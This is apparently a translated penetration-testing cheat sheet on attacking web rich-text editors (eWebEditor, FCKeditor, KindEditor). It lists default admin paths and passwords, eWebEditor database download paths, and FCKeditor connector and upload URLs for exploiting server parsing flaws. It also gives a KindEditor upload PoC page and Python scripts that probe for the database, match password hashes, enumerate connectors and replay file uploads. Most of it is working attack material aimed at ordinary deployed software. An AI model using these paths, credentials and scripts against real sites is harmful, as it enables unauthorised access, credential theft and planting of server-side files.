Editor families: eWebEditor, KindEditor, CKEditor, FCKeditor, Cute Editor, UEditor, SouthidcEditor, and so on.

I. eWebEditor (database path disclosure, file upload, directory traversal, SQL injection, etc.)

(1) Vulnerability 1: default paths and credentials

Admin_Login.asp         login page

Admin_Default.asp         admin home page

Admin_Style.asp         style management page

Admin_UploadFile.asp         file upload management page

Upload.asp         file upload handler

Admin_ModiPwd.asp         password change page

eWebEditor.asp         database file (an .mdb renamed to .asp)

ewebeditor/db/ewebeditor.mdb         default database path

Default admin path in versions before eWebEditor 2.8.0:

ewebeditor/admin_login.asp

Default admin path in other versions:

admin/login.asp, or admin/editor/login_admin.asp

Default account/password: admin / admin, or admin / admin888

Other commonly used passwords for admin: admin999, admin1, admin000

(2) Vulnerability 2: direct database download

If the default username and password do not work on the admin page, try downloading the database directly:

../db/ewebeditor.mdb or ../db/ewebeditor.asp, and

ewebeditor/db/ewebeditor.asa

ewebeditor/db/ewebeditor.asp

ewebeditor/db/#ewebeditor.asa

ewebeditor/db/#ewebeditor.mdb

ewebeditor/db/!@#ewebeditor.asp

ewebeditor/db/ewebeditor1033.mdb

The username and password are in the eWebEditor_System table, stored as MD5 hashes.

Many administrators rename the database to an .asp extension, so requesting the .asp or .asa file in a browser shows what looks like garbage: that is the binary Access file being returned as-is. Save it with a download tool, then rename it to .mdb to open and read the contents.
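The two checks above (is the "garbage" actually the Access database, and do the MD5 hashes in eWebEditor_System match the default passwords) are easy to get wrong by eye. The following Python is an added example, not code from the original page or from eWebEditor: it probes the candidate paths the page lists, recognises a Jet/ACE database by its file header regardless of the extension it was served under, and tests a stored hash against the default password list. The hostname is a placeholder, the fetch callable is injected so the logic runs offline, and accepting the 16-character truncated digest as well as the full 32-character one is an assumption about how some builds store passwords.

```python
import hashlib
import re
from urllib.parse import quote

# Candidate database locations copied from the page, relative to the site root.
DB_PATHS = [
    "ewebeditor/db/ewebeditor.mdb",
    "ewebeditor/db/ewebeditor.asp",
    "ewebeditor/db/ewebeditor.asa",
    "ewebeditor/db/#ewebeditor.asa",
    "ewebeditor/db/#ewebeditor.mdb",
    "ewebeditor/db/!@#ewebeditor.asp",
    "ewebeditor/db/ewebeditor1033.mdb",
]

# Default and commonly reused passwords from the page; the default user is admin.
COMMON_PASSWORDS = ["admin", "admin888", "admin999", "admin1", "admin000"]


def looks_like_access_db(data: bytes) -> bool:
    """True if the bytes start with a Microsoft Access (Jet or ACE) file header.

    An .mdb renamed to .asp/.asa keeps this header; that header is what the
    'garbled' browser output really is.  An ASP error page or an HTML login
    form will not match.
    """
    return data[:4] == b"\x00\x01\x00\x00" and data[4:19] in (
        b"Standard Jet DB",
        b"Standard ACE DB",
    )


def classify_download(data: bytes) -> str:
    """Label a downloaded body as 'access-db', 'html' or 'other'."""
    if looks_like_access_db(data):
        return "access-db"
    if re.search(rb"<\s*html|<\s*form", data[:2048], re.IGNORECASE):
        return "html"
    return "other"


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def crack_md5(stored: str, candidates=COMMON_PASSWORDS):
    """Return the candidate whose MD5 equals `stored`, or None.

    Assumption: besides the full 32-hex digest, the 16-character middle slice
    (digest[8:24]) is accepted, since some builds store only that slice.
    """
    stored = stored.strip().lower()
    for pw in candidates:
        full = md5_hex(pw)
        if stored in (full, full[8:24]):
            return pw
    return None


def probe(base_url: str, fetch):
    """Try every candidate path; fetch(url) -> bytes or None (urllib or a fake).

    The '#' and '!' in the odd file names must be percent-encoded: an unencoded
    '#' is treated as a URL fragment by the client and is never sent.
    """
    for path in DB_PATHS:
        url = base_url.rstrip("/") + "/" + quote(path)
        body = fetch(url)
        if body and looks_like_access_db(body):
            return path
    return None
```

In practice `fetch` is a thin wrapper around `urllib.request.urlopen` that returns `None` on a 404; `probe` then hands back the first path that really is a database, and `crack_md5` is run over each row of eWebEditor_System once the file is opened.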

II. FCKeditor (file upload, combined with web-server parsing vulnerabilities)

(1) Check the version

/fckeditor/editor/dialog/fck_about.html

/FCKeditor/_whatsnew.html

(2) File upload pages (combine with a parsing vulnerability in IIS/Apache to get uploaded content executed)

FCKeditor/editor/filemanager/browser/default/connectors/test.html(2.4.3)

FCKeditor/editor/filemanager/upload/test.html(2.4.3)

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

(3) Sample pages

FCKeditor/_samples/default.html(2.4.3)

FCKeditor/_samples/asp/sample01.asp(2.4.3)

FCKeditor/_samples/asp/sample02.asp(2.4.3)

FCKeditor/_samples/asp/sample03.asp(2.4.3)

FCKeditor/_samples/asp/sample04.asp(2.4.3)

FCKeditor/_samples/default.html

FCKeditor/editor/fckeditor.htm

FCKeditor/editor/fckdialog.html

(4) More connector and file-browser URLs

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site/fckeditor/editor/filemanager/connectors/php/connector.php

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site/fckeditor/editor/filemanager/connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site/fckeditor/editor/filemanager/connectors/aspx/connector.aspx

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site/fckeditor/editor/filemanager/connectors/jsp/connector.jsp

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (2.6.3)

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

FCKeditor/editor/filemanager/connectors/test.html(2.6.6)

FCKeditor/editor/filemanager/connectors/uploadtest.html(2.6.6)

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php
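The connector URLs above all speak the same small protocol, so rather than reading raw responses in a browser it helps to script the check. The Python below is an added example, not code from the original page or from the FCKeditor project: it builds the GetFoldersAndFiles probe URL for each server-side language the page lists, parses the XML a connector returns (folders, files, and the URL of the user-files directory, which is where an upload lands), flags file names shaped for the IIS 6 `;` and Apache multi-extension parsing tricks, and decodes the `OnUploadCompleted` JavaScript callback the connector returns after a FileUpload. The base URL and all responses are constructed samples; the suspicious-name pattern is a heuristic of this example, not a rule from the page.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlencode

# Server-side connectors the page lists, under browser/default/connectors/<lang>/.
CONNECTOR_SCRIPTS = {
    "asp": "connector.asp",
    "aspx": "connector.aspx",
    "jsp": "connector.jsp",
    "php": "connector.php",
}

# Connector error numbers (0 = ok, 201 = file was renamed on the server).
ERR_OK, ERR_RENAMED = 0, 201

# Heuristic: names that an IIS 6 ';' truncation or an Apache multi-extension
# parse would hand to a script engine (shell.asp;.jpg, x.php.jpg, a.cer ...).
SUSPICIOUS = re.compile(r"\.(asp|aspx|asa|cer|cdx|php|jsp)(;|\.|$)", re.IGNORECASE)

# Constructed GetFoldersAndFiles response in the connector's XML format.
SAMPLE_LISTING = (
    '<?xml version="1.0" encoding="utf-8" ?>'
    '<Connector command="GetFoldersAndFiles" resourceType="Image">'
    '<CurrentFolder path="/" url="/userfiles/image/" />'
    '<Folders><Folder name="2010" /></Folders>'
    '<Files><File name="logo.jpg" size="12" /><File name="shell.asp;.jpg" size="3" /></Files>'
    "</Connector>"
)


def connector_urls(base: str, resource_type: str = "Image", folder: str = "/") -> dict:
    """Return {lang: probe URL} for the GetFoldersAndFiles command."""
    query = urlencode({"Command": "GetFoldersAndFiles",
                       "Type": resource_type, "CurrentFolder": folder})
    prefix = base.rstrip("/") + "/FCKeditor/editor/filemanager/browser/default/connectors"
    return {lang: f"{prefix}/{lang}/{script}?{query}"
            for lang, script in CONNECTOR_SCRIPTS.items()}


def parse_listing(xml_text: str):
    """Parse a GetFoldersAndFiles response into (folders, files, current_url).

    Raises ValueError for anything that is not a connector response, e.g. an
    HTML 404 page or a disabled-connector error page.
    """
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text).strip()
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        raise ValueError(f"not connector XML: {exc}")
    if root.tag != "Connector":
        raise ValueError(f"root element is <{root.tag}>, not <Connector>")
    err = root.find("Error")
    if err is not None and int(err.get("number", "0")) != ERR_OK:
        raise ValueError(f"connector error {err.get('number')}")
    current = root.find("CurrentFolder")
    folders = [f.get("name") for f in root.findall("Folders/Folder")]
    files = [(f.get("name"), int(f.get("size", "0"))) for f in root.findall("Files/File")]
    return folders, files, current.get("url") if current is not None else None


def flag_suspicious(files) -> list:
    """Names from a listing that look like parse-vulnerability payloads."""
    return [name for name, _size in files if SUSPICIOUS.search(name)]


# window.parent.OnUploadCompleted(errorNumber, fileUrl, fileName, customMsg)
UPLOAD_CALLBACK = re.compile(
    r'OnUploadCompleted\(\s*(\d+)\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"')


def parse_upload_response(html: str):
    """Decode the script the connector sends back after Command=FileUpload."""
    match = UPLOAD_CALLBACK.search(html)
    if not match:
        return None
    return {"error": int(match.group(1)), "url": match.group(2),
            "name": match.group(3), "msg": match.group(4)}
```

A listing that parses but whose `CurrentFolder` URL is missing usually means the connector is enabled but the user-files path is not web-reachable; a `ValueError` with "root element is <html>" is the common sign that the connector path exists but is disabled and returning a page instead of XML.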

III. KindEditor (file upload)

1. Check the version (precondition: KindEditor <= 4.1.5)

http://www.xxx/kindeditor//kindeditor.js        (usually the default location; the version string is in the file's header comment)

2. Even if the version reported is 4.1.10, it is still worth trying: check whether the upload_json.* handler exists at the following paths, since that file is the upload point that needs confirming.

kindeditor/asp/upload_json.asp?dir=file

kindeditor/asp.net/upload_json.ashx?dir=file

kindeditor/jsp/upload_json.jsp?dir=file

kindeditor/php/upload_json.php?dir=file

3. Here the jsp upload point was found to exist (the original shows a screenshot of the response):

http://www.xxx/kindeditor/jsp/upload_json.jsp?dir=file

4. Build the upload PoC below; change the <script src="..."> and the url : value to match the target.

<html><head>
<title>Uploader</title>
<script src="http://www.xxx/kindeditor//kindeditor.js"></script>
<script>
KindEditor.ready(function(K) {
    var uploadbutton = K.uploadbutton({
        button : K('#uploadButton')[0],
        fieldName : 'imgFile',
        url : 'http://www.xxx/kindeditor/jsp/upload_json.jsp?dir=file',
        afterUpload : function(data) {
            if (data.error === 0) {
                var url = K.formatUrl(data.url, 'absolute');
                K('#url').val(url);
            }
        },
    });
    uploadbutton.fileBox.change(function(e) {
        uploadbutton.submit();
    });
});
</script></head><body>
<div class="upload">
    <input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
    <input type="button" id="uploadButton" value="Upload" />
</div>
</body>
</html>

5. Open the page in a browser, then start Burp Suite and intercept the request it sends on upload; the .txt file is uploaded successfully.
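What the browser and Burp Suite produce in step 5 is a single multipart POST with an `imgFile` field to `upload_json.*?dir=file`, answered with a small JSON object. The Python below is an added example, not code from the original page or from the KindEditor project: it builds that request by hand so the upload can be replayed without the PoC page, and decodes the `{"error":0,"url":...}` / `{"error":1,"message":...}` reply. The target URL and file contents are placeholders; the `opener` argument exists so the request logic can be exercised offline.

```python
import json
import urllib.request
import uuid


def build_multipart(field: str, filename: str, content: bytes,
                    content_type: str = "text/plain", boundary: str = None):
    """Return (body, Content-Type header) for a one-file multipart/form-data POST."""
    boundary = boundary or uuid.uuid4().hex
    parts = [
        f"--{boundary}".encode(),
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"'.encode(),
        f"Content-Type: {content_type}".encode(),
        b"",
        content,
        f"--{boundary}--".encode(),
        b"",
    ]
    return b"\r\n".join(parts), f"multipart/form-data; boundary={boundary}"


def parse_upload_json(text: str):
    """Decode upload_json's reply; None if the body is not that JSON shape.

    error == 0 carries "url" (where the file was stored, relative to the
    site); error == 1 carries "message" (typically a rejected extension).
    """
    try:
        data = json.loads(text)
    except ValueError:
        return None
    if not isinstance(data, dict) or "error" not in data:
        return None
    return data


def upload(target: str, filename: str, content: bytes,
           field: str = "imgFile", opener=urllib.request.urlopen):
    """POST one file to upload_json.*?dir=<dir> and return the decoded reply."""
    body, ctype = build_multipart(field, filename, content)
    req = urllib.request.Request(target, data=body, method="POST")
    req.add_header("Content-Type", ctype)
    with opener(req) as resp:
        return parse_upload_json(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # Placeholder target from the page; dir=file selects the 'file' extension list.
    TARGET = "http://www.xxx/kindeditor/jsp/upload_json.jsp?dir=file"
    print(upload(TARGET, "test.txt", b"upload test"))
```

The `url` in a successful reply is the path under which the server stored the file; fetching it confirms the upload is reachable, and trying `.html` in place of `.txt` with the same request shows whether the handler also accepts content a browser will render.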

Part of this article is reproduced from: kindeditor<=4.1.5上传漏洞复现 - 渗透测试中心 - 博客园 (KindEditor <= 4.1.5 upload vulnerability reproduction, 渗透测试中心 on 博客园).
